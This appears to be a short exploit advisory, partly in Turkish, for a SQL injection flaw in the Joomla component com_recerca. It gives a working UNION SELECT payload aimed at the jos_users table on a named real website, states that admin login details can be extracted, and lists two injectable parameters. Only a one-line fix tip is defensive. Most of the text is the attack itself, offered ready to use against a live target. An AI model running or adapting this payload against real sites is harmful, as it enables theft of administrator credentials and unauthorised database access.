<------------------- header data start ------------------- >

#############################################################

# author : Kadir DOGAN

# Script Name : Joomla Component com_recerca SQL injection Vulnerability

# Bug Type : SqL Injections

# Infection : Admin giris bilgileri alinabilir.

# Demo Vuln. : http://www.ibecbarcelona.eu/index.php?option=com_recerca&task=linia&ansubdepartments_id=-14+union+select+0,version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+jos_users--

# Bug Fix Advice : Zararli karakterler filtrelenmelidir.


#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

?option=com_recerca&Itemid=1004&task=view&dept_id=[SqL]

?option=com_recerca&task=linia&ansubdepartments_id=[SqL]


< -- bug code end of -- >